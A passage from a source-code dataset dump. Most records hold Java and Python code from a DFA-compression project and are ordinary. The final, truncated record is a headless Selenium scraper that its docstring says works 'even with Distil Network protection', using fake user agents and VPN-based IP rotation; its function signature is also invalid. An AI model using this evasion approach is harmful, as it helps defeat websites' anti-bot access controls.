modifiedCopy.nodesCount();\n compress(modifiedCopy);\n assert x == modifiedCopy.nodesCount();\n\n compress(modified);\n System.out.println(\"ThompsonModifiedHeuristic: \" + modified.nodesCount());\n\n new RecursiveCompressorStatic().compress(modified);\n System.out.println(\"HeuristicThenRecursive: \" + modified.nodesCount());\n\n\n\n// modifiedMinCopy.print();\n\n System.out.println();\n System.out.flush();\n }\n}\n"
},
{
"alpha_fraction": 0.5777778029441833,
"alphanum_fraction": 0.5908045768737793,
"avg_line_length": 31.625,
"blob_id": "378446a7102fdf5816970613751a59abe4227d89",
"content_id": "9a0432c9f89955ad75b3fb429d0b4065d7928740",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1305,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 40,
"path": "/py_util/list_csv_convert.py",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "import csv\nimport re\n\n\n# with open('./data/top10/top10stats.txt', 'r') as list_file:\nwith open('./data/top10/top10recursive.txt', 'r') as list_file:\n segments = list_file.read().rstrip('\\n').split('\\n\\n')\n \n\nparsed_segments = []\nall_names = {'size'}\nfor segment in segments:\n segment = segment.split('\\n')\n segment_dict = {}\n if re.search(r\"\\d+\", segment[0]) is None:\n print(\"\\n===\\n\".join(segments))\n segment_dict['size'] = re.search(r\"\\d+\", segment[0]).group()\n # print(re.search(r\"\\d+\", segment[0]).group())\n for row in segment[1:]:\n entry = re.search(r\".*: \", row)\n name = entry.group()[:-2].replace('-', '_')\n value = row[entry.end():]\n # print(entry.group())\n # print(value)\n # print(row)\n # print('===')\n segment_dict[name] = value\n all_names.add(name)\n parsed_segments.append(segment_dict)\n\n\n# with open('./data/refined/top10.csv', 'w') as csvfile:\nwith open('./data/refined/top10recursive.csv', 'w') as csvfile:\n results_writer = csv.writer(csvfile, quoting=csv.QUOTE_MINIMAL)\n index = list(all_names)\n results_writer.writerow(index) \n for segment_dict in parsed_segments:\n row = [segment_dict[name] for name in index]\n # print(row)\n results_writer.writerow(row)\n"
},
{
"alpha_fraction": 0.6600000262260437,
"alphanum_fraction": 0.6600000262260437,
"avg_line_length": 18.230770111083984,
"blob_id": "7ae4124200a294e6925bf3867022b7d2a840e55e",
"content_id": "473cb8774d2e5282090c272fe7dfb81fb3328b00",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 250,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 13,
"path": "/src/main/java/util/MySet.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package util;\n\nimport java.util.Arrays;\nimport java.util.HashSet;\nimport java.util.List;\nimport java.util.Set;\n\npublic class MySet {\n @SafeVarargs\n public static <T> Set<T> of(T ... a) {\n return new HashSet<T>(Arrays.asList(a));\n }\n}\n"
},
{
"alpha_fraction": 0.5549450516700745,
"alphanum_fraction": 0.5668498277664185,
"avg_line_length": 35.400001525878906,
"blob_id": "85dec5e7cf024d0860298f8a1d90e123b90507a8",
"content_id": "b1f12fb3979d83bf80e515980cee7afadf420d9c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 2184,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 60,
"path": "/src/main/java/intgraph/ChromaticNumberCalculator.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package intgraph;\n\nimport util.IntMonitor;\n\nimport java.util.*;\nimport java.util.stream.Collectors;\n\npublic class ChromaticNumberCalculator {\n private IntMonitor __debugNodesSize = new IntMonitor(\"Remaining nodes\", 100, IntMonitor.Mode.LINEAR);\n// private IntMonitor __debugEdgesSize = new IntMonitor(\"Remaining edges\", 100, IntMonitor.Mode.LINEAR);\n\n public int calculate(IntGraph graph) { // No one-node loops\n int colors = 0;\n while (graph.nodes.size() != 0) {\n graph = processStep(graph);\n colors++;\n }\n return colors;\n }\n\n private IntGraph processStep(IntGraph graph) {\n int edges = graph.nodes.stream().map(node -> node.edges.size()).reduce(0, Integer::sum) / 2;\n __debugNodesSize.update(graph.nodes.size());\n\n HashMap<Integer, Integer> penalty = new HashMap<>();\n PriorityQueue<IntGraph.IntNode> queue = new PriorityQueue<>(20, new Comparator<IntGraph.IntNode>() {\n @Override\n public int compare(IntGraph.IntNode o1, IntGraph.IntNode o2) {\n return -Integer.compare(o1.edges.size() - penalty.getOrDefault(o1.id, 0),\n o2.edges.size() - penalty.getOrDefault(o2.id, 0));\n }\n });\n\n queue.addAll(graph.nodes);\n IntGraph future = new IntGraph();\n HashMap<Integer, Integer> toFuture = new HashMap<>();\n while (edges != 0) {\n IntGraph.IntNode cur = queue.remove();\n\n int newId = future.addNode();\n toFuture.put(cur.id, newId);\n\n assert cur.edges.size() - penalty.getOrDefault(cur.id, 0) > 0 : cur.id;\n\n for (int target : cur.edges) {\n if (!toFuture.containsKey(target)) {\n edges--;\n penalty.put(target, penalty.getOrDefault(target, 0) + 1);\n boolean __success = queue.remove(graph.nodes.get(target));\n assert __success;\n queue.add(graph.nodes.get(target));\n } else {\n future.addEdge2(newId, toFuture.get(target));\n }\n }\n }\n\n return future;\n }\n}\n"
},
{
"alpha_fraction": 0.4724409580230713,
"alphanum_fraction": 0.47356581687927246,
"avg_line_length": 32.54716873168945,
"blob_id": "f1a53af4945f2602ad0ba77f86c849c610547d50",
"content_id": "32a4d2538d2e19e506b0a2f09c43b4143f20e347",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1778,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 53,
"path": "/src/main/java/automaton/algo/compressor/validator/HeuristicValidator.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package automaton.algo.compressor.validator;\n\nimport automaton.dfa.Dfa;\nimport automaton.dfa.Node;\nimport util.Pair;\n\nimport java.util.*;\nimport java.util.stream.Collectors;\n\npublic class HeuristicValidator {\n public boolean test(Dfa dfa) {\n Map<Node, Set<Pair<Character, Node>>> mp = new HashMap<>();\n HashSet<Node> nodes = new HashSet<>(dfa.allNodes());\n for (Node node : nodes) {\n mp.put(node, new HashSet<>());\n }\n for (Node node : nodes) {\n node.getEdges().forEach((c, target) -> {\n mp.get(target).add(new Pair<>(c, node));\n });\n }\n\n ArrayList<Node> ordered = new ArrayList<>(nodes);\n ordered = ordered.stream().filter(Objects::nonNull).collect(Collectors.toCollection(ArrayList::new));\n for (int i = 0; i < ordered.size(); i++) {\n Node a = ordered.get(i);\n if (a == null || a.isTerminal()) {\n continue;\n }\n Map<Character, Node> aEdges = a.getEdges();\n for (int j = 0; j < i; j++) {\n Node b = ordered.get(j);\n if (b == null || b.isTerminal()) {\n continue;\n }\n Map<Character, Node> bEdges = b.getEdges();\n boolean failed = false;\n for (Map.Entry<Character, Node> entry : aEdges.entrySet()) {\n char c = entry.getKey();\n Node target = entry.getValue();\n if (bEdges.containsKey(c) && bEdges.get(c) != target) {\n failed = true;\n }\n }\n\n if (!failed) {\n return false;\n }\n }\n }\n return true;\n }\n}\n"
},
{
"alpha_fraction": 0.5986078977584839,
"alphanum_fraction": 0.6004640460014343,
"avg_line_length": 34.3278694152832,
"blob_id": "983ab647c5826c9db04c8d306b39b547da996500",
"content_id": "24a45e6d758e4a5e92af8d9681b7955c566a3b75",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 4310,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 122,
"path": "/src/main/java/main/graph/GroupsMetric.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package main.graph;\n\nimport automaton.algo.compressor.recursive.RecursiveCompressorDynamic;\nimport automaton.algo.thompson.ThompsonModified;\nimport automaton.dfa.Dfa;\nimport automaton.nfa.Nfa;\nimport main.Main;\nimport main.io.Input;\nimport main.io.Static;\nimport util.Utils;\n\nimport java.io.IOException;\nimport java.util.List;\nimport java.util.stream.Collectors;\n\nimport static main.Main.*;\n\npublic class GroupsMetric {\n public static void main(String[] args) throws IOException {\n List<List<String>> groupRules = Input.readGroups(Static.FILTERED, Static.TOP_10_GROUPS);\n\n for (List<String> group : groupRules) {\n processGroup(group);\n }\n }\n\n public static void processGroup(List<String> rules) {\n System.out.println(\"Total \" + rules.size() + \" rules\");\n\n List<Nfa> nfas = rules.parallelStream()\n .map(Main::buildNfa)\n .collect(Collectors.toList());\n for (int i = 0; i < nfas.size(); i++) {\n nfas.get(i).close(i);\n }\n\n // Nfa:\n List<Nfa> nfasSingle = rules.parallelStream()\n .map(Main::buildNfa)\n .peek(nfa -> nfa.close(1))\n .collect(Collectors.toList());\n\n // Dfa:\n int sum = nfasSingle.parallelStream()\n .map(Main::convert)\n .map(Main::minimizeHopcroft)\n .map(Dfa::nodesCount)\n .reduce(Integer::sum)\n .orElse(0);\n System.out.println(\"Sum-of-single: \" + sum);\n\n int max = nfasSingle.parallelStream()\n .map(Main::convert)\n .map(Main::minimizeHopcroft)\n .map(Dfa::nodesCount)\n .reduce(Integer::max)\n .orElse(0);\n System.out.println(\"Max-of-single: \" + max);\n\n Dfa dfaSingleMin = minimizeHopcroft(convert(Nfa.union(nfasSingle)));\n System.out.println(\"Single-terminal-minimized: \" + dfaSingleMin.nodesCount());\n\n Dfa combined = convert(Nfa.union(nfas));\n System.out.println(\"Combined: \" + combined.nodesCount());\n Dfa dfaMin = minimizeHopcroft(combined);\n System.out.println(\"Minimized: \" + dfaMin.nodesCount());\n\n System.out.println(\"Minimized-cut: \" + (dfaMin.cutCount() + nfas.size()));\n\n Dfa modified = new ThompsonModified().run(nfas);\n System.out.println(\"ThompsonModified: \" + modified.nodesCount());\n Utils.writeTo(\"./output/graph/result.txt\", modified.print(Dfa.PrintingMode.SERIALIZE));\n\n// Dfa modifiedMin = minimizeHopcroft(modified);\n compress(modified);\n System.out.println(\"ThompsonModifiedHeuristic: \" + modified.nodesCount());\n\n new RecursiveCompressorDynamic().compress(modified);\n System.out.println(\"HeuristicThenRecursive: \" + modified.nodesCount());\n\n Dfa modifiedCopy = new ThompsonModified().run(nfas);\n new RecursiveCompressorDynamic().compress(modifiedCopy);\n System.out.println(\"ThompsonModifiedRecursive: \" + modifiedCopy.nodesCount());\n int x = modifiedCopy.nodesCount();\n compress(modifiedCopy);\n assert x == modifiedCopy.nodesCount();\n\n// modifiedMinCopy.print();\n\n System.out.println();\n System.out.flush();\n }\n\n public static void processGroupDependent(List<String> rules) {\n System.out.println(\"Total \" + rules.size() + \" rules\");\n\n List<Nfa> nfas = rules.parallelStream()\n .map(Main::buildNfa)\n .collect(Collectors.toList());\n for (int i = 0; i < nfas.size(); i++) {\n nfas.get(i).close(i);\n }\n\n // Nfa:\n// List<Nfa> nfasSingle = rules.parallelStream()\n// .map(Main::buildNfa)\n// .peek(nfa -> nfa.close(1))\n// .collect(Collectors.toList());\n\n // Dfa:\n// Dfa dfaSingleMin = minimizeHopcroft(convert(Nfa.union(nfasSingle)));\n// System.out.println(\"Single-terminal-minimized: \" + dfaSingleMin.nodesCount());\n\n Dfa combined = convert(Nfa.union(nfas));\n System.out.println(\"Combined: \" + combined.nodesCount());\n Dfa dfaMin = minimizeHopcroft(combined);\n System.out.println(\"Minimized: \" + dfaMin.nodesCount());\n\n System.out.println();\n System.out.flush();\n }\n}\n"
},
{
"alpha_fraction": 0.47398316860198975,
"alphanum_fraction": 0.47558754682540894,
"avg_line_length": 38.83074188232422,
"blob_id": "dbd698d169b86a3304f47cd61f660ebda64128c8",
"content_id": "4a2136f52afe8b217647796a8a424138c3a14745",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 23062,
"license_type": "no_license",
"max_line_length": 150,
"num_lines": 579,
"path": "/src/main/java/automaton/algo/compressor/recursive/RecursiveCompressorDynamic.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package automaton.algo.compressor.recursive;\n\nimport automaton.dfa.Dfa;\nimport automaton.dfa.Node;\nimport automaton.transition.Transitions;\nimport main.io.Static;\nimport util.IntMonitor;\nimport util.Pair;\nimport util.Utils;\n\nimport java.util.*;\nimport java.util.logging.Logger;\nimport java.util.stream.Collectors;\n\npublic class RecursiveCompressorDynamic {\n private Dfa dfa;\n private Map<Node, Integer> index;\n private ArrayList<Node> nodes;\n private byte[][] distinct; // 1 <-> dependent, 0 <-> maybe independent\n private MergeDsu mergeQueue;\n\n List<HashMap<Character, Set<Integer>>> incident;\n private Set<Integer> nonMerged;\n// private List<Set<Integer>> dependent; // TODO: dependent -> independent?\n\n private IntMonitor __debugSizeMonitor = new IntMonitor(\"Nodes remaining\", 100, IntMonitor.Mode.LINEAR);\n\n private boolean areDependent(int i, int j) {\n if (i < j) {\n return areDependent(j, i);\n }\n return distinct[i][j] == 1;\n// return dependent.get(i).contains(j);\n }\n\n private void setDependent(int i, int j) {\n if (i < j) {\n setDependent(j, i);\n }\n// dependent.get(i).add(j);\n// dependent.get(j).add(i);\n distinct[i][j] = 1;\n// distinct[j][i] = 1;\n }\n\n private void clearDependence(int i) { // Non-merged only\n for (int id : nonMerged) {\n distinct[Integer.max(id, i)][Integer.min(id, i)] = 0;\n }\n }\n\n private void buildMatrix() {\n nodes = new ArrayList<>(dfa.allNodes());\n index = new HashMap<>();\n int counter = 0;\n for (Node node : nodes) {\n if (node != null) {\n index.put(node, counter);\n }\n counter++;\n }\n\n nonMerged = new HashSet<>(nodes.size());\n for (int i = 0; i < nodes.size(); i++) {\n if (nodes.get(i) != null) {\n nonMerged.add(i);\n }\n }\n\n Map<Node, Set<Pair<Character, Node>>> mp = new HashMap<>();\n for (Node node : nodes) {\n// if (node != null) {\n mp.put(node, new HashSet<>());\n// }\n }\n for (Node node : nodes) {\n if (node != null) {\n node.getEdges().forEach((c, target) -> {\n mp.get(target).add(new Pair<>(c, node));\n });\n }\n }\n\n distinct = new byte[nodes.size()][nodes.size()];\n\n Queue<Pair<Integer, Integer>> queue = new ArrayDeque<>();\n\n for (int i = 0; i < nodes.size(); i++) {\n if (!nodes.get(i).isTerminal()) {\n continue;\n }\n assert nodes.get(i).getTerminal().size() == 1;\n for (int j = 0; j < i; j++) {\n if (nodes.get(i).isTerminal() && nodes.get(j).isTerminal()) {\n assert !nodes.get(i).getTerminal().equals(nodes.get(j).getTerminal());\n setDependent(i, j);\n queue.add(new Pair<>(i, j));\n }\n }\n }\n\n incident = new ArrayList<>();\n for (int i = 0; i < nodes.size(); i++) {\n incident.add(new HashMap<>());\n }\n for (int i = 0; i < nodes.size(); i++) {\n int finalI = i;\n mp.get(nodes.get(i)).forEach(pair -> {\n incident.get(finalI).putIfAbsent(pair.getFirst(), new HashSet<>());\n incident.get(finalI).get(pair.getFirst()).add(index.get(pair.getSecond()));\n });\n }\n\n traverseDependence(queue);\n }\n\n private void updateMatrix() {\n Queue<Pair<Integer, Integer>> queue = new ArrayDeque<>();\n\n List<Integer> nonMergedList = new ArrayList<>(nonMerged);\n for (int i = 0; i < nonMergedList.size(); i++) {\n for (int j = 0; j < i; j++) {\n int realI = nonMergedList.get(i);\n int realJ = nonMergedList.get(j);\n if (areDependent(realI, realJ)) {\n queue.add(new Pair<>(realI, realJ));\n }\n }\n }\n\n traverseDependence(queue);\n }\n\n\n private void printDependence() {\n System.out.print(\"Dependence:\\n \");\n for (int i = 0; i < nodes.size(); i++) {\n if (nodes.get(i) != null) {\n System.out.print(\" \" + i);\n }\n }\n System.out.println();\n for (int i = 0; i < nodes.size(); i++) {\n if (nodes.get(i) != null) {\n System.out.print(i);\n for (int j = 0; j < nodes.size(); j++) {\n if (nodes.get(j) != null) {\n int s = areDependent(i, j) ? 1 : 0;\n System.out.print(\" \" + s);\n }\n }\n System.out.println();\n }\n }\n System.out.println();\n }\n\n private void printInfo() {\n System.out.println(\"Total \" + nodes.size() + \" nodes:\");\n for (int i = 0; i < nodes.size(); i++) {\n System.out.print(Utils.objCode(nodes.get(i)) + \"/\" + i + \": \");\n Node node = nodes.get(i);\n if (node == null) {\n System.out.print(\"null\");\n } else {\n Map<Character, Node> edges = node.getEdges();\n if (edges == null) {\n System.out.print(\"null\");\n } else {\n if (edges.size() > 10) {\n System.out.print(\"r\" + edges.size() + \" \");\n }\n edges.forEach((c, target) -> {\n if (c >= 'a' && c <= 'f') {\n System.out.print(\"<\" + c + \", \" + Utils.objCode(target) + \"/\" + index.get(target) + \"> \");\n }\n });\n }\n }\n System.out.println();\n }\n System.out.println(\"Incident:\");\n for (int i = 0; i < nodes.size(); i++) {\n System.out.println(i + \":\");\n if (incident.get(i) == null) {\n System.out.println(\" null\");\n } else {\n for (char c = 'a'; c <= 'f'; c++) {\n Set<Integer> incidentCurrent = incident.get(i).get(c);\n if (incidentCurrent != null) {\n System.out.print(\" \" + c + \": <\");\n incidentCurrent.forEach(id -> System.out.print(id + \" \"));\n System.out.println(\">\");\n }\n }\n }\n }\n System.out.print(\"Non-merged: \");\n nonMerged.forEach(id -> System.out.print(id + \" \"));\n System.out.println();\n System.out.println(\"Start: \" + Utils.objCode(dfa.getStart()) + \" / \" + index.get(dfa.getStart()));\n\n System.out.print(\"Index: \");\n index.forEach((node, id) -> {\n System.out.print(\"<\" + Utils.objCode(node) + \", \" + id + \"> \");\n });\n System.out.println();\n\n System.out.print(\"Nodes: \");\n nodes.forEach(node -> System.out.print(Utils.objCode(node) + \" \"));\n System.out.println();\n System.out.println();\n }\n\n\n private boolean runMergeAt(int i, int j) {\n mergeQueue = new MergeDsu();\n mergeQueue.insertPair(i, j);\n if (!mergeQueue.processQueue()) {\n return false;\n }\n mergeQueue.applyPartition();\n return true;\n }\n\n private void traverseDependence(Queue<Pair<Integer, Integer>> queue) {\n while (!queue.isEmpty()) { // TODO: replace with function & synchronized queue?\n Pair<Integer, Integer> cur = queue.remove();\n int i = cur.getFirst();\n int j = cur.getSecond();\n incident.get(i).keySet().stream()\n .filter(incident.get(j)::containsKey)\n .forEach(c -> {\n incident.get(i).get(c).forEach(a -> {\n incident.get(j).get(c).forEach(b -> {\n if (!areDependent(a, b)) {\n setDependent(a, b);\n queue.add(new Pair<>(a, b));\n }\n });\n });\n });\n }\n }\n\n private boolean tryShrink() {\n List<Integer> nonMergedList = new ArrayList<>(nonMerged);\n for (int i = 0; i < nonMergedList.size(); i++) {\n for (int j = 0; j < i; j++) { // TODO: FASTER pairs hashset?\n int realI = nonMergedList.get(i);\n int realJ = nonMergedList.get(j);\n if (!areDependent(realI, realJ)) {\n boolean success = runMergeAt(realI, realJ);\n if (!success) {\n setDependent(realI, realJ);\n Queue<Pair<Integer, Integer>> queue = new ArrayDeque<>();\n queue.add(new Pair<>(realI, realJ));\n traverseDependence(queue);\n } else {\n // TODO: smart continue?\n return true;\n }\n }\n }\n }\n return false;\n }\n\n public void compress(Dfa dfa) {\n dfa.close();\n this.dfa = dfa;\n\n buildMatrix();\n boolean updated = true;\n while (updated) {\n updateMatrix();\n __debugSizeMonitor.update(dfa.nodesCount());\n if (Static.DEBUG_RUN) dfa.print(index);\n if (Static.DEBUG_RUN) printDependence();\n updated = tryShrink();\n }\n }\n\n private class MergeDsu {\n private Map<Integer, Component> componentsMap = new HashMap<>();\n private Queue<Pair<Integer, Integer>> queue = new ArrayDeque<>();\n\n public MergeDsu() {\n }\n\n private Component getComponent(int id) {\n if (componentsMap.containsKey(id)) {\n return componentsMap.get(id);\n }\n Component newComponent = new Component(id);\n componentsMap.put(id, newComponent);\n return newComponent;\n }\n\n private boolean inComponent(int id) {\n return componentsMap.containsKey(id);\n }\n\n private void applyPartition() { // TODO: reduce overhead for single-node components?\n List<Component> components = componentsMap.values().stream()\n .distinct()\n .collect(Collectors.toList());\n\n int nodesSavedSize = nodes.size();\n\n HashMap<Component, Integer> componentsIndex = new HashMap<>();\n HashMap<Component, Integer> componentsNewIndex = new HashMap<>();\n HashMap<Integer, Integer> componentsTransfer = new HashMap<>();\n for (Component component : components) { // Add new nodes\n Node newNode = new Node();\n int newNodeId = nodes.size();\n nodes.add(newNode);\n index.put(newNode, newNodeId);\n// nonMerged.add(newNodeId); // later\n incident.add(new HashMap<>()); // TODO: do not need?\n// dependent.add(new HashSet<>());\n\n componentsIndex.put(component, newNodeId);\n int newId = component.entries.stream().min(Integer::compareTo).get();\n componentsNewIndex.put(component, newId);\n componentsTransfer.put(newNodeId, newId);\n }\n\n if (Static.DEBUG_RUN) {\n System.err.println(\"Merging:\");\n for (Component component : components) {\n System.err.print(componentsIndex.get(component) + \": \");\n String s = component.entries.stream().map(Objects::toString).collect(Collectors.joining(\" \"));\n System.err.println(s);\n }\n }\n\n // Fill components with edges (orig index)\n for (Component component : components) {\n Node newNode = nodes.get(componentsIndex.get(component));\n newNode.setEdges(component.mergedEdges.entrySet().stream()\n .collect(Collectors.toMap(Map.Entry::getKey, entry -> nodes.get(entry.getValue()))));\n }\n\n // Fill incident (temporary index)\n for (Component component : components) {\n int componentId = componentsIndex.get(component);\n for (char c = 0; c <= Transitions.MAX_CHAR; c++) {\n char finalC = c;\n Set<Integer> newIncident = component.entries.stream()\n .flatMap(id -> incident.get(id).getOrDefault(finalC, Collections.emptySet()).stream())\n .map(id -> inComponent(id) ? componentsIndex.get(getComponent(id)) : id)\n .collect(Collectors.toSet());\n if (newIncident.size() > 0) {\n incident.get(componentId).put(c, newIncident);\n }\n }\n }\n\n // Update incidents for non-components (final)\n for (Component component : components) {\n component.entries.forEach(entryId -> {\n nodes.get(entryId).getEdges().forEach((c, node) -> {\n int nodeId = index.get(node);\n if (!inComponent(nodeId)) {\n Map<Character, Set<Integer>> incidents = incident.get(nodeId);\n incidents.put(c, incidents.get(c).stream()\n .map(id -> inComponent(id) ? componentsNewIndex.get(getComponent(id)) : id)\n .collect(Collectors.toSet())\n );\n }\n });\n });\n }\n\n if (Static.DEBUG_RUN) printInfo();\n // Update edges for all (final index)\n for (Component component : components) {\n for (char c = 0; c <= Transitions.MAX_CHAR; c++) {\n char finalC = c;\n// component.entries.stream()\n incident.get(componentsIndex.get(component)).getOrDefault(finalC, Collections.emptySet())\n// .flatMap(id -> incident.get(id).getOrDefault(finalC, Collections.emptySet()).stream())\n .forEach(id -> {\n assert nodes.get(id) != null : id + \" \" + nodes.size();\n nodes.get(id).addEdge(finalC, nodes.get(componentsIndex.get(component)));\n });\n }\n }\n if (Static.DEBUG_RUN) printInfo();\n\n // TODO: remove solo nodes\n // TODO: anything more to remove?\n // TODO: remove mirror dependent\n\n // Calculate new dependence\n HashMap<Component, Set<Integer>> newDistincts = new HashMap<>();\n for (Component component : components) {\n Set<Integer> newDistinct = component.entries.stream()\n .flatMap(entry -> nonMerged.stream()\n .filter(id -> areDependent(entry, id)))\n .distinct()\n .map(id -> inComponent(id) ? componentsNewIndex.get(getComponent(id)) : id)\n .collect(Collectors.toSet());\n newDistincts.put(component, newDistinct);\n }\n\n // Clear dependence\n for (Component component : components) {\n int newId = componentsNewIndex.get(component);\n clearDependence(newId);\n }\n\n // Update start\n int startId = index.get(dfa.getStart());\n if (inComponent(startId)) {\n if (Static.DEBUG_RUN) System.err.println(\"Start transferred: \" + startId + \" -> \" + componentsIndex.get(getComponent(startId)));\n dfa.setStart(nodes.get(componentsIndex.get(getComponent(startId))));\n }\n\n // Move components\n for (Component component : components) {\n int newId = componentsNewIndex.get(component);\n int oldId = componentsIndex.get(component);\n index.remove(nodes.get(newId));\n newDistincts.get(component).forEach(id -> setDependent(newId, id));\n nodes.set(newId, nodes.get(oldId));\n index.put(nodes.get(oldId), newId);\n incident.set(newId, incident.get(oldId));\n }\n\n // Remove shrunk from nonMerged\n for (Component component : components) {\n component.entries.forEach(id -> {\n boolean __nonMergedRemoved = nonMerged.remove(id);\n assert __nonMergedRemoved;\n });\n }\n\n // Add component nodes\n for (Component component : components) {\n int newId = componentsNewIndex.get(component);\n nonMerged.add(newId);\n }\n\n // Update incident (final index)\n for (Component component : components) {\n int newComponentId = componentsNewIndex.get(component);\n HashMap<Character, Set<Integer>> incidentComponent = incident.get(newComponentId);\n for (char c = 0; c <= Transitions.MAX_CHAR; c++) {\n if (incidentComponent.containsKey(c)) {\n incidentComponent.put(c,\n incident.get(newComponentId).get(c).stream()\n .map(id -> componentsTransfer.getOrDefault(id, id))\n .collect(Collectors.toSet()));\n\n }\n }\n }\n\n // Destroy temporary nodes\n while (nodes.size() != nodesSavedSize) {\n int i = nodes.size() - 1;\n nodes.remove(i);\n incident.remove(i);\n }\n\n HashSet<Integer> newComponents = new HashSet<>(componentsNewIndex.values());\n for (Component component : components) { // Remove shrunk nodes\n component.entries.forEach(id -> {\n assert !nodes.get(id).isTerminal();\n if (!newComponents.contains(id)) {\n nodes.get(id).corrupt();\n\n Object __indexPrevious = index.remove(nodes.get(id));\n assert __indexPrevious != null;\n\n Object __nodesPrevious = nodes.set(id, null);\n assert __nodesPrevious != null;\n\n incident.set(id, null);\n }\n });\n }\n\n if (Static.DEBUG_RUN) printInfo();\n assert nonMerged.stream().map(nodes::get).noneMatch(Objects::isNull);\n if (Static.DEBUG_RUN) System.err.println(nonMerged.stream().map(Objects::toString).collect(Collectors.joining(\" \")));\n if (Static.DEBUG_RUN) System.err.println(dfa.allNodes().stream().map(index::get).map(Objects::toString).collect(Collectors.joining(\" \")));\n assert nonMerged.stream().map(nodes::get).collect(Collectors.toSet()).equals(new HashSet<>(dfa.allNodes()));\n// dfa.print(index);\n assert nonMerged.stream().map(nodes::get)\n .flatMap(node -> node.getEdges().values().stream())\n .allMatch(node -> nonMerged.contains(index.get(node)));\n }\n\n private boolean processQueue() {\n while (!queue.isEmpty()) {\n Pair<Integer, Integer> cur = queue.remove();\n int i = Integer.max(cur.getFirst(), cur.getSecond());\n int j = Integer.min(cur.getFirst(), cur.getSecond());\n if (getComponent(i).merge(getComponent(j)) == null) {\n return false;\n }\n }\n return true;\n }\n\n public void insertPair(int i, int j) {\n if (Static.DEBUG_RUN) Logger.getGlobal().info(\"InsertPair:\" + i + \" \" + j);\n if (i == j || getComponent(i) == getComponent(j)) {\n return;\n }\n queue.add(new Pair<>(i, j));\n }\n\n private class Component {\n private Component head;\n private HashSet<Integer> entries;\n private Map<Character, Integer> mergedEdges;\n\n public Component(int n) {\n assert nonMerged.contains(n);\n assert nodes.get(n) != null : n + \" \" + nodes.size();\n entries = new HashSet<>();\n entries.add(n);\n mergedEdges = nodes.get(n).getEdges().entrySet().stream()\n .collect(Collectors.toMap(Map.Entry::getKey, entry -> index.get(entry.getValue())));\n }\n\n public Component getHead() {\n if (head == null) {\n return this;\n }\n return head = head.getHead();\n }\n\n public Component merge(Component other) {\n if (this == other) {\n return this;\n }\n// assert this != other;\n if (entries.size() < other.entries.size()) {\n return other.merge(this);\n }\n if (Static.DEBUG_RUN)\n System.err.println(\"Entries 1: \" + entries.stream().map(Objects::toString).collect(Collectors.joining(\" \")));\n if (Static.DEBUG_RUN)\n System.err.println(\"Entries 2: \" + other.entries.stream().map(Objects::toString).collect(Collectors.joining(\" \")));\n\n for (Integer id : entries) {\n for (Integer otherId : other.entries) {\n// if (distinct[Integer.max(id, otherId)][Integer.min(id, otherId)] == 1) {\n if (areDependent(id, otherId)) {\n return null;\n }\n }\n }\n\n for (Map.Entry<Character, Integer> entry : other.mergedEdges.entrySet()) {\n Character c = entry.getKey();\n Integer otherTarget = entry.getValue();\n if (mergedEdges.containsKey(c)) {\n Integer target = mergedEdges.get(c);\n mergeQueue.insertPair(otherTarget, target);\n } else {\n mergedEdges.put(c, otherTarget);\n }\n }\n other.entries.forEach(id -> componentsMap.put(id, this));\n entries.addAll(other.entries);\n other.head = this;\n if (Static.DEBUG_RUN)\n System.err.println(\"New component: \" + entries.stream().map(Objects::toString).collect(Collectors.joining(\" \")));\n return this;\n }\n }\n }\n}\n"
}
] | 36 |
jorgeluisztr/WebScrapper_Distil_Proof
|
https://github.com/jorgeluisztr/WebScrapper_Distil_Proof
|
3729745ef5237c3ccfe6c44e31aaa7c920cb196e
|
cb34cd86050b5c3cab529bc54c2c006d071459a8
|
9772e7ec807808a18164555cea7c3f605dee52ad
|
refs/heads/master
| 2020-06-08T08:16:29.537341 | 2019-06-22T05:25:24 | 2019-06-22T05:25:24 | 193,194,792 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.687747061252594,
"alphanum_fraction": 0.6892292499542236,
"avg_line_length": 31.14285659790039,
"blob_id": "48d4aa80e80aa12e7061313722e5b6c8fb95df5b",
"content_id": "165f516d5ff62ae749d5eb2c592eef925387c22e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2024,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 63,
"path": "/webscrapper.py",
"repo_name": "jorgeluisztr/WebScrapper_Distil_Proof",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\nfrom selenium.webdriver.firefox.options import Options\nfrom fake_useragent import UserAgent\nimport os\n\nopts = Options()\nopts.set_headless()\nassert opts.headless\n\n### In this example i will use a range of numbered pages to extract info\n\ndef scrapper(path, rangeofnumbered, iplist, geckopath, waitingtime = 1, interestedpattern, vpnon, vpnoff):\n\n '''\n\n This Web Scrapper is useful even with Distil Network protection\n\n\n :param path: str the domain of the page of interested\n :param rangeofnumbered: range Range of the numbered pages of interested\n :param dateobtained: tuple The data of interested\n :param iplist: list list of ips that you want to use\n :param geckopath: str the gecko driver path in your computer\n :param waitingtime: int seconds to wait for any visit default = 1\n :param interestedpattern: str the data that you are looking for\n :param vpnon: str command in shell to start vpn\n :param vpnoff: str command in shell to finished vpn\n :return:\n '''\n\n dataobtained =[]\n\n\n for i in rangeofnumbered:\n\n # Use a vpn to use a new ip for example vpn\n count = [0]\n 